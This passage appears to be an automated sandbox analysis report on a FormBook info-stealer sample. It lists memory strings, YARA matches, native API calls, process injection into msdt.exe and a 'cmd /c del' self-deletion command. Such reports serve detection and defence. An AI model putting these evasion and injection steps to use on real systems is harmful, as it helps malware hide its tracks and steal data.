          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/9
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/f
          Source: V5cfxBHd71.exe, 00000000.00000003.238699786.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nly
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/tion
          Source: V5cfxBHd71.exe, 00000000.00000003.239126621.000000000627C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/y
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: V5cfxBHd71.exe, 00000000.00000003.236412505.000000000627E000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comFI
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: V5cfxBHd71.exe, 00000000.00000003.243718619.000000000627E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.debI
          Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_004182AC NtReadFile,
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D4B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D4A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D4A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D4A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D4AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D49520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A582E0 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A58260 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A58390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A582AC NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 0_2_00EA4C65
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 0_2_030AC2B0
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 0_2_030A9990
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B8B1
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B963
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00408C50
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B493
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B496
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041C539
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00402D89
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041CE85
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041BF12
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041C795
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_004D4C65
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D1B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DC1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D26E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D3EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04DD1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D0F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D00D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B8B1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B954
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B496
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B493
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A48C4B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A48C50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A42D89
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A42D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5C539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5CE85
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A42FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5C795
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5BF12
          Source: V5cfxBHd71.exeBinary or memory string: OriginalFilename vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exe, 00000000.00000002.257959634.00000000031D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConfigNodeType.dll> vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exe, 00000000.00000002.257092467.0000000000EA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIdentityNotMappedExcepti.exe6 vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exe, 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoreElement.dllB vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exeBinary or memory string: OriginalFilename vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exe, 00000004.00000002.352461046.00000000004D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIdentityNotMappedExcepti.exe6 vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs V5cfxBHd71.exe
          Source: V5cfxBHd71.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: V5cfxBHd71.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@9/3
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\V5cfxBHd71.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
          Source: V5cfxBHd71.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: V5cfxBHd71.exeVirustotal: Detection: 29%
          Source: V5cfxBHd71.exeReversingLabs: Detection: 30%
          Source: unknownProcess created: C:\Users\user\Desktop\V5cfxBHd71.exe 'C:\Users\user\Desktop\V5cfxBHd71.exe'
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess created: C:\Users\user\Desktop\V5cfxBHd71.exe C:\Users\user\Desktop\V5cfxBHd71.exe
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess created: C:\Users\user\Desktop\V5cfxBHd71.exe C:\Users\user\Desktop\V5cfxBHd71.exe
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: V5cfxBHd71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: V5cfxBHd71.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: V5cfxBHd71.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp
          Source: V5cfxBHd71.exeStatic PE information: 0xF0944DD6 [Mon Nov 25 20:51:34 2097 UTC]
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B2A2 push cs; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00415414 push esp; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00414F46 push cs; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeCode function: 4_2_00415FC5 push ebp; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_04D5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B3FB push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A55414 push esp; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5B45C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A55FC5 push ebp; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A5BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00A54F46 push cs; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.40347651298
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\V5cfxBHd71.exeProcess information set: NOOPENFILEERRORBOX
